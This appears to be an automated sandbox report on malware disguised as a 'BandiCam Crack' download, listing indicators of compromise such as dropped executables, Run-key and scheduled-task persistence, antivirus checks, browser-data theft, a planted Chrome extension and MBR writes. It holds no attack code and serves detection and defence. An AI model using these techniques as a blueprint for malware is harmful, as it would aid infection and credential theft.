gcleaner | hxxps://mgen[.]fast-dl[.]cc/

System Information Discovery

Processes:

0HW768fG3olr.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0HW768fG3olr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

FlKR.exechrome.exechrome.exeZtcNaKI.exe0HW768fG3olr.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	FlKR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	ZtcNaKI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	0HW768fG3olr.exe

Executes dropped EXE 26 IoCs

Processes:

BandiCam Crack.exeis-VPF07.tmpIC44.exeIC44.exeafvJQ8Vb.exeis-LQ960.tmpZerkalo331.exe0HW768fG3olr.exeEeif6JOgRWUZxkt.exeis-24570.tmpZerkalo331.exeWerFault.exekKXIb9fN89vd9isuw6.exeis-40LCD.tmpSyncBackupShell.exeT5x5yJ8fvDw42wmDC6l.exeFlKR.exeZxeJj.exechromedriver.exechrome.exechrome.exechrome.exechrome.exechrome.exenohHFDg.exeZtcNaKI.exe

pid	process
3868	BandiCam Crack.exe
1272	is-VPF07.tmp
2236	IC44.exe
3308	IC44.exe
4328	afvJQ8Vb.exe
732	is-LQ960.tmp
816	Zerkalo331.exe
4384	0HW768fG3olr.exe
1948	Eeif6JOgRWUZxkt.exe
2464	is-24570.tmp
3716	Zerkalo331.exe
3808	WerFault.exe
4336	kKXIb9fN89vd9isuw6.exe
4076	is-40LCD.tmp
4080	SyncBackupShell.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
4076	FlKR.exe
3740	ZxeJj.exe
4868	chromedriver.exe
3324	chrome.exe
3168	chrome.exe
3152	chrome.exe
1516	chrome.exe
3848	chrome.exe
4464	nohHFDg.exe
5760	ZtcNaKI.exe

Loads dropped DLL 64 IoCs

Processes:

BandiCam Crack.exeis-VPF07.tmpis-LQ960.tmpis-24570.tmpis-40LCD.tmpT5x5yJ8fvDw42wmDC6l.exe

pid	process
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
3868	BandiCam Crack.exe
1272	is-VPF07.tmp
732	is-LQ960.tmp
2464	is-24570.tmp
2464	is-24570.tmp
2464	is-24570.tmp
4076	is-40LCD.tmp
4076	is-40LCD.tmp
4076	is-40LCD.tmp
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe
2336	T5x5yJ8fvDw42wmDC6l.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\nsc3339.tmp\GetVersion.dll	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

T5x5yJ8fvDw42wmDC6l.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run	T5x5yJ8fvDw42wmDC6l.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\toc = "C:\\Users\\Admin\\AppData\\Roaming\\toc\\FlKR.exe"	T5x5yJ8fvDw42wmDC6l.exe

Checks for any installed AV software in registry 1 TTPs 19 IoCs

Security Software Discovery

T1063

Processes:

BandiCam Crack.exeZtcNaKI.exeIC44.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\Version	BandiCam Crack.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	BandiCam Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira	ZtcNaKI.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build = "qpUTreRAw"	ZtcNaKI.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build	IC44.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	IC44.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	ZtcNaKI.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	ZtcNaKI.exe
Key opened	\REGISTRY\MACHINE\Software\Avast Software\Avast	BandiCam Crack.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop	ZtcNaKI.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build	IC44.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	BandiCam Crack.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast	BandiCam Crack.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir	BandiCam Crack.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir	BandiCam Crack.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast\Version	BandiCam Crack.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV	BandiCam Crack.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop\Build	IC44.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop	IC44.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

Processes:

ZtcNaKI.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\iddmabhekhhonkmomaklnflhhgbfnioe\1.0.0_0\manifest.json	ZtcNaKI.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

ZtcNaKI.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ZtcNaKI.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

402 api.ipify.org
403 api.ipify.org
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

setup_2.exe_id25986943.exe

description ioc process

File opened for modification \??\PhysicalDrive0 setup_2.exe_id25986943.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	ZtcNaKI.exe

flow	ioc
402	api.ipify.org
403	api.ipify.org

description	ioc	process
File opened for modification	\??\PhysicalDrive0	setup_2.exe_id25986943.exe

Drops file in System32 directory 27 IoCs

Processes:

ZtcNaKI.exenohHFDg.exe0HW768fG3olr.exereg.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5038C0447BCAF9C6EE7F2D13E3E0DDAD	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_F21BF538BAEA56C2FC86EE4A4D9AD2BF	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	ZtcNaKI.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	nohHFDg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5038C0447BCAF9C6EE7F2D13E3E0DDAD	ZtcNaKI.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	ZtcNaKI.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	0HW768fG3olr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_AA1ADD4071D073F3048022453A5FE061	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_F21BF538BAEA56C2FC86EE4A4D9AD2BF	ZtcNaKI.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	reg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	ZtcNaKI.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	ZtcNaKI.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	reg.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_AA1ADD4071D073F3048022453A5FE061	ZtcNaKI.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	nohHFDg.exe

Drops file in Program Files directory 64 IoCs

Processes:

is-VPF07.tmpis-LQ960.tmpis-40LCD.tmpZtcNaKI.exeSyncBackupShell.exe

description	ioc	process
File created	C:\Program Files (x86)\ImageComparer\is-31SQF.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\is-2OAQC.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-TUUG2.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\is-DQTHA.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\unins000.dat	is-LQ960.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-ARGNB.tmp	is-LQ960.tmp
File created	C:\Program Files (x86)\BRngBackup\Help\images\is-7947D.tmp	is-40LCD.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-SN26E.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-LHHNR.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-DHAVB.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\is-RPVMT.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-JA19L.tmp	is-LQ960.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-FHGCP.tmp	is-LQ960.tmp
File created	C:\Program Files (x86)\BRngBackup\Help\images\is-M358T.tmp	is-40LCD.tmp
File created	C:\Program Files (x86)\BRngBackup\Help\images\is-RVF8O.tmp	is-40LCD.tmp
File created	C:\Program Files (x86)\uXFrNnbxU\GozTVNE.xml	ZtcNaKI.exe
File created	C:\Program Files (x86)\ltrhbdpAzPnaisqePaR\wBCuDYY.xml	ZtcNaKI.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	ZtcNaKI.exe
File created	C:\Program Files (x86)\xzDgZbVAMpcU2\PIqCEOBugPYsX.dll	ZtcNaKI.exe
File created	C:\Program Files (x86)\xzDgZbVAMpcU2\EgXZnWi.xml	ZtcNaKI.exe
File created	C:\Program Files (x86)\ImageComparer\languages\is-QFRIF.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-MRBJO.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-HPU37.tmp	is-LQ960.tmp
File opened for modification	C:\Program Files (x86)\Zerkalo 1.5\unins000.dat	is-LQ960.tmp
File opened for modification	C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe	is-LQ960.tmp
File opened for modification	C:\Program Files (x86)\BRngBackup\unins000.dat	is-40LCD.tmp
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{A5735E22-7BD8-4CED-A24E-FBBD2D9CABB9}.xpi	ZtcNaKI.exe
File created	C:\Program Files (x86)\ImageComparer\languages\is-5021K.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-RIG51.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-782CV.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-G857R.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-8IH99.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\clFlow	SyncBackupShell.exe
File created	C:\Program Files (x86)\ImageComparer\is-0474R.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\is-DLQ7N.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-5Q317.tmp	is-LQ960.tmp
File created	C:\Program Files (x86)\BRngBackup\unins000.dat	is-40LCD.tmp
File created	C:\Program Files (x86)\BRngBackup\is-QF5RT.tmp	is-40LCD.tmp
File opened for modification	C:\Program Files (x86)\ImageComparer\ImageComparer.url	is-VPF07.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-ABKCJ.tmp	is-LQ960.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-7D6PV.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-UMQE5.tmp	is-VPF07.tmp
File opened for modification	C:\Program Files (x86)\ImageComparer\IC44.exe	is-VPF07.tmp
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	ZtcNaKI.exe
File created	C:\Program Files (x86)\BRngBackup\is-Q5BMO.tmp	is-40LCD.tmp
File opened for modification	C:\Program Files (x86)\BRngBackup\SyncBackupShell.exe	is-40LCD.tmp
File created	C:\Program Files\Mozilla Firefox\browser\features\{A5735E22-7BD8-4CED-A24E-FBBD2D9CABB9}.xpi	ZtcNaKI.exe
File created	C:\Program Files (x86)\ImageComparer\is-TQ509.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-I65PQ.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-GEBPN.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\ltrhbdpAzPnaisqePaR\RIEpyAw.dll	ZtcNaKI.exe
File created	C:\Program Files (x86)\YyYjRnRkbVRlC\oAPPItR.xml	ZtcNaKI.exe
File created	C:\Program Files (x86)\ImageComparer\unins000.dat	is-VPF07.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-IM198.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\BRngBackup\is-DL6OE.tmp	is-40LCD.tmp
File created	C:\Program Files (x86)\ImageComparer\languages\is-RNS2D.tmp	is-VPF07.tmp
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	ZtcNaKI.exe
File created	C:\Program Files (x86)\zWoUVQYphcUn\lqrgxDi.dll	ZtcNaKI.exe
File created	C:\Program Files (x86)\ImageComparer\languages\is-ELQE6.tmp	is-VPF07.tmp
File created	C:\Program Files (x86)\Zerkalo 1.5\is-JVTSD.tmp	is-LQ960.tmp
File created	C:\Program Files (x86)\BRngBackup\is-MERLB.tmp	is-40LCD.tmp
File created	C:\Program Files (x86)\BRngBackup\Help\is-0QLCO.tmp	is-40LCD.tmp
File created	C:\Program Files (x86)\BRngBackup\Languages\is-5G114.tmp	is-40LCD.tmp
File created	C:\Program Files (x86)\BRngBackup\is-ELCSC.tmp	is-40LCD.tmp

Drops file in Windows directory 4 IoCs

Processes:

svchost.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bPLWYbEmiNLoeLgDZO.job	svchost.exe
File created	C:\Windows\Tasks\rrfLLMZdwqFuiRyRk.job	schtasks.exe
File created	C:\Windows\Tasks\IHfUYafURfJPxJE.job	schtasks.exe
File created	C:\Windows\Tasks\sZfSYDKOGgdsigSHj.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 61 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3752	2236	WerFault.exe	IC44.exe
2976	2236	WerFault.exe	IC44.exe
4928	2236	WerFault.exe	IC44.exe
4064	2236	WerFault.exe	IC44.exe
4608	3308	WerFault.exe	IC44.exe
3960	3308	WerFault.exe	IC44.exe
3168	3308	WerFault.exe	IC44.exe
4756	3308	WerFault.exe	IC44.exe
2696	3308	WerFault.exe	IC44.exe
1716	3308	WerFault.exe	IC44.exe
332	3308	WerFault.exe	IC44.exe
3848	3308	WerFault.exe	IC44.exe
1816	3308	WerFault.exe	IC44.exe
4412	3308	WerFault.exe	IC44.exe
2512	3308	WerFault.exe	IC44.exe
4160	3308	WerFault.exe	IC44.exe
1600	3308	WerFault.exe	IC44.exe
1220	3308	WerFault.exe	IC44.exe
2760	3308	WerFault.exe	IC44.exe
4712	3308	WerFault.exe	IC44.exe
3212	3308	WerFault.exe	IC44.exe
4900	3308	WerFault.exe	IC44.exe
1680	3308	WerFault.exe	IC44.exe
2948	3308	WerFault.exe	IC44.exe
3328	3308	WerFault.exe	IC44.exe
2336	3308	WerFault.exe	IC44.exe
1808	3308	WerFault.exe	IC44.exe
236	3308	WerFault.exe	IC44.exe
2608	3308	WerFault.exe	IC44.exe
3408	3308	WerFault.exe	IC44.exe
3152	3308	WerFault.exe	IC44.exe
4216	3308	WerFault.exe	IC44.exe
3616	3308	WerFault.exe	IC44.exe
3748	3308	WerFault.exe	IC44.exe
3768	3308	WerFault.exe	IC44.exe
4464	3308	WerFault.exe	IC44.exe
4740	3308	WerFault.exe	IC44.exe
4432	3308	WerFault.exe	IC44.exe
384	3308	WerFault.exe	IC44.exe
2948	3308	WerFault.exe	IC44.exe
3952	3308	WerFault.exe	IC44.exe
2656	3308	WerFault.exe	IC44.exe
4176	3308	WerFault.exe	IC44.exe
1748	3308	WerFault.exe	IC44.exe
3764	3308	WerFault.exe	IC44.exe
4488	3308	WerFault.exe	IC44.exe
3068	3308	WerFault.exe	IC44.exe
2868	3308	WerFault.exe	IC44.exe
4232	3308	WerFault.exe	IC44.exe
3808	3308	WerFault.exe	IC44.exe
5080	3308	WerFault.exe	IC44.exe
2128	3308	WerFault.exe	IC44.exe
3512	3308	WerFault.exe	IC44.exe
2976	3308	WerFault.exe	IC44.exe
1728	3308	WerFault.exe	IC44.exe
2876	3308	WerFault.exe	IC44.exe
4860	3308	WerFault.exe	IC44.exe
428	3308	WerFault.exe	IC44.exe
6020	3308	WerFault.exe	IC44.exe
2008	3308	WerFault.exe	IC44.exe
3552	3308	WerFault.exe	IC44.exe

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3820	schtasks.exe
1800	schtasks.exe
4692	schtasks.exe
816	schtasks.exe
4588	schtasks.exe
2768	schtasks.exe
5660	schtasks.exe
1068	schtasks.exe
3244	schtasks.exe
1008	schtasks.exe
5988	schtasks.exe
3684	schtasks.exe

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exe0HW768fG3olr.exechrome.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	0HW768fG3olr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	0HW768fG3olr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3164 taskkill.exe

pid	process
3164	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exeZtcNaKI.exerundll32.exechrome.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ZtcNaKI.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	ZtcNaKI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	ZtcNaKI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
